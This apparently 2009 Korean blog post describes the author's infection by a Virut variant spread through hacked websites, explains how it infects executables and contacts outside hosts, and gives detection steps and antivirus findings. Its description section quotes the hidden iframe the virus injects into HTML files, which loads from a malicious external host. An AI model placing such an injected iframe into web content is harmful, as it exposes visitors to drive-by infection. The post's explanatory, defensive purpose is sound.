악성 코드로 번지는 Virut 변종 바이러스

Virut 바이러스라고, 윈도우의 기본 프로그램 중 하나인 Winlogon.exe에 서식하여 실행 파일인 *.exe와 화면 보호기인 *.scr의 로컬 드라이브를 감염시키는 강력한 바이러스가 있습니다. 감염 후 특정 IRC 서버와 웹 호스트에 접속하는 특성이 있습니다. 그런데, 이 바이러스의 변종이 등장했습니다. 그것도 저번에 언급했던 여러 인터넷 홈페이지의 해킹으로 인한 악성 코드 실행이 그 원인입니다.

2009/04/11 - 악성 코드가 포함된 것으로 보고되는 알라딘

처음 알라딘 TTB2에 대해 구글 안전 브라우징이 경고한 것을 보고 이 문제를 확인했습니다.

2009/04/11 - 악성 코드가 넘칩니다, 웹 서핑 조심하세요.

이 악성 코드는 알라딘 뿐 아니라, 여러 사이트에서 발견되어 퍼져나갔습니다. 이 악성 코드는 iframe으로 해당 페이지에 삽입되어 보안 구멍을 이용해 웹 페이지를 여는 사용자의 컴퓨터를 감염시키는 문제가 있었습니다.

그리고 제 컴퓨터도 이 악성 코드에 의해 바이러스에 감염되었습니다.

바이러스의 특징

이 바이러스의 특징은 꽤 단순합니다. 우선 Virut 바이러스처럼 모든 실행 파일과 화면 보호기를 감염시킵니다. 그리고 *.htm, *.html 등 HTML 파일에서 끝에 iframe src="http://jL.chura.pl/rc/" style="display:none" 코드를 넣습니다. 이것은 보이지 않는 iframe 영역을 넣어서 이 컴퓨터가 웹서버일 경우 다른 컴퓨터가 접근했을 때 마찬가지로 감염될 수 있도록 하는 역할을 합니다. 파일을 열어 수정하더라도 저장되는 순간 감지하여 다시 코드를 넣기 때문에 바이러스를 제거하기 전까지는 모든 HTML 파일에 이 코드가 강제로 들어가게 됩니다.

또한 Winlogon.exe이 특정 웹 서버와 접속하여 통신을 시도합니다. 확인 방법은 작업 관리자를 실행하여 winlogon.exe의 PID(Process ID)를 확인합니다. PID가 표시되지 않을 경우 보기>열 선택에서 PID를 체크해주시면 됩니다.

다음 시작 버튼을 눌러 실행 메뉴를 선택하거나 윈도우 키+R을 눌러 실행 창을 띄워 cmd를 눌러 명령어 모드에서 netstat -o -a를 쳐서 winlogon.exe가 특정 호스트와 접속을 시도하는지 확인하면 됩니다.

제 경우에도 이와 같은 절차를 거쳐 확인해 보니, 특정 호스트와 winlogon.exe가 접속되어 있더군요. 접속되어 있는 IP는 KINX가 보유한 IP 대역대였습니다.

V3는 잡지 못 하는 Virut 변종

문제는 이 바이러스가 국내에서도 별로 알려져 있지 않고 V3로도 잡을 수 없다는 것이었습니다. V3 2007 플래티넘을 사용 중이었으나, 전혀 인식하지 못 했던 것입니다. 그래서 해외 포럼에서 정보를 찾아 보았습니다. Avast에서도 이 바이러스는 잡지 못 하고 유일하게 카퍼스키만이 잡을 수 있다는 사실을 확인했습니다.

카스퍼스키는 90일 무료 체험판을 다운로드 받아 사용할 수 있습니다.

카스퍼스키 다운로드

여러 바이러스 백신 중에서 카스퍼스키만이 Win32:Virut.ce 바이러스를 잡을 수 있는 것으로 확인되었습니다.

안철수 연구소에 바이러스 신고

우선 안철수 연구소에 바이러스 보고를 했습니다. 제가 사용 중인 바이러스 보호 프로그램이 V3 2007 플래티넘이었고, 보고되지 않았다고 판단되었기 때문입니다.

아바스트 포럼에서도 아직 아바스트가 못 잡는다는 이야기가 있더군요. 확인 법은 있었지만 이미 실행 파일 등에 감염된 것까지 처리하는 방법은 없었습니다. 안철수 연구소에서도 처음 접수된 듯 하더군요. 아직 안철수 연구소에서도 백신 데이터 베이스를 갱신하지 않은 상태입니다.

한숨은 돌렸지만…

겨우 백신 프로그램을 돌려서 쭉 잡아보았더니 작은 파일 크기의 *.exe와 *.scr은 모두 감염되어 있었습니다. 이 바이러스의 특징 중 하나가 5MB 이하의 작은 파일에 대해서만 감염시킨다는 점이더군요.

카스퍼스키 체험판을 깔아 우선 Virut.ce 바이러스는 피했지만, 여러 경로를 조심하는데도 불구하고 악성 코드를 통해 바이러스에 당하는 건 처음인 듯 해서 참으로 충격적입니다. 조심한다 조심한다 해도 이렇게 당하다니.

앞으로는 구글 안전브라우징이 경고하는 사이트는 피해야겠습니다. 블로깅 등을 위해 들락날락하다 보니 언제 감염되었는지도 몰랐으니 말입니다.

※ V3에서도 오후 1시 기준으로 정보가 업데이트 되어서 치료 가능하게 되었습니다. Win-Trojan/Exploit-PDF으로 2009.04.22.02 업데이트부터 적용됩니다.